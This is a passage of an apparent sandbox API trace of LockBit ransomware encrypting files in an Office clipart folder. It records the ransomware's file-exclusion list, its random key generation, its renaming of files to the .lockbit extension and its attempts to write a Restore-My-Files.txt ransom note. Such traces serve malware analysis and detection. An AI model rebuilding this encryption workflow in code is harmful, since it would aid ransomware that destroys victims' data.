NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.280] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.280] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.281] free (_Block=0x1fa2ed8) [0176.284] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01561_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.284] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.284] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.284] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc04ea900, ftCreationTime.dwHighDateTime=0x1bd4af7, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc04ea900, ftLastWriteTime.dwHighDateTime=0x1bd4af7, nFileSizeHigh=0x0, nFileSizeLow=0x75ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01563_.WMF", cAlternateFileName="")) returned 1 [0176.284] lstrcmpiW (lpString1=".", lpString2="SO01563_.WMF") returned -1 [0176.284] lstrcmpiW (lpString1="..", lpString2="SO01563_.WMF") returned -1 [0176.284] PathFindExtensionW (pszPath="SO01563_.WMF") returned=".WMF" [0176.284] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.284] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.284] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.284] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.284] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.284] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.284] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.284] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.284] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.284] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.284] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.285] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.285] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.286] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.286] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.286] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.286] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.286] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.286] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.286] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.286] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.286] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.286] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.286] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.286] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.286] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.286] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01563_.WMF") returned -1 [0176.286] lstrcmpiW (lpString1="ntldr", lpString2="SO01563_.WMF") returned -1 [0176.286] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01563_.WMF") returned -1 [0176.287] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01563_.WMF") returned -1 [0176.287] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01563_.WMF") returned -1 [0176.287] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01563_.WMF") returned 1 [0176.287] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01563_.WMF") returned -1 [0176.287] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.287] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01563_.WMF") returned=".WMF" [0176.287] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.287] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.287] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.287] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.287] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.287] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.287] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.287] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.287] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.287] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.287] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.287] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.287] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.287] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.287] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.287] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.288] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.288] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.288] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.288] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.288] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.288] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.288] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.288] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.288] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.288] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.288] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.288] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.288] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01563_.WMF.lockbit") returned 72 [0176.288] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01563_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01563_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0176.289] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.290] malloc (_Size=0x40068) returned 0x1ff1e60 [0176.290] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=30154) returned 1 [0176.290] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.290] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0176.290] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.291] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0176.291] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.293] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01563_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01563_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.293] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.293] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.295] free (_Block=0x1fa2ed8) [0176.295] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01563_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.295] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.295] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.295] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcbb2200, ftCreationTime.dwHighDateTime=0x1bd4af7, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbcbb2200, ftLastWriteTime.dwHighDateTime=0x1bd4af7, nFileSizeHigh=0x0, nFileSizeLow=0x51a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01566_.WMF", cAlternateFileName="")) returned 1 [0176.295] lstrcmpiW (lpString1=".", lpString2="SO01566_.WMF") returned -1 [0176.295] lstrcmpiW (lpString1="..", lpString2="SO01566_.WMF") returned -1 [0176.295] PathFindExtensionW (pszPath="SO01566_.WMF") returned=".WMF" [0176.295] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.295] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.295] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.295] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.295] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.295] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.295] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.295] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.295] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.295] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.296] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.296] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.297] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01566_.WMF") returned -1 [0176.297] lstrcmpiW (lpString1="ntldr", lpString2="SO01566_.WMF") returned -1 [0176.297] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01566_.WMF") returned -1 [0176.297] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01566_.WMF") returned -1 [0176.297] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01566_.WMF") returned -1 [0176.297] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01566_.WMF") returned 1 [0176.297] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01566_.WMF") returned -1 [0176.297] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.297] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01566_.WMF") returned=".WMF" [0176.298] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.298] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.298] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.299] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.299] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.299] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.299] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.299] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.299] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01566_.WMF.lockbit") returned 72 [0176.299] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01566_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01566_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0176.304] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.304] malloc (_Size=0x40068) returned 0x3d70450 [0176.304] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=20904) returned 1 [0176.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.305] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0176.305] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.305] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0176.305] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0176.307] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01566_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01566_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.308] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.308] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.309] free (_Block=0x1fa2ed8) [0176.309] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01566_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.309] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.309] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.309] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebb7200, ftCreationTime.dwHighDateTime=0x1bd4b0f, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xebb7200, ftLastWriteTime.dwHighDateTime=0x1bd4b0f, nFileSizeHigh=0x0, nFileSizeLow=0x54b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01568_.WMF", cAlternateFileName="")) returned 1 [0176.309] lstrcmpiW (lpString1=".", lpString2="SO01568_.WMF") returned -1 [0176.309] lstrcmpiW (lpString1="..", lpString2="SO01568_.WMF") returned -1 [0176.310] PathFindExtensionW (pszPath="SO01568_.WMF") returned=".WMF" [0176.310] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.310] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.311] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.311] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.312] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01568_.WMF") returned -1 [0176.312] lstrcmpiW (lpString1="ntldr", lpString2="SO01568_.WMF") returned -1 [0176.312] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01568_.WMF") returned -1 [0176.312] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01568_.WMF") returned -1 [0176.312] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01568_.WMF") returned -1 [0176.312] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01568_.WMF") returned 1 [0176.312] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01568_.WMF") returned -1 [0176.312] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.312] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01568_.WMF") returned=".WMF" [0176.312] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.312] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.312] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned 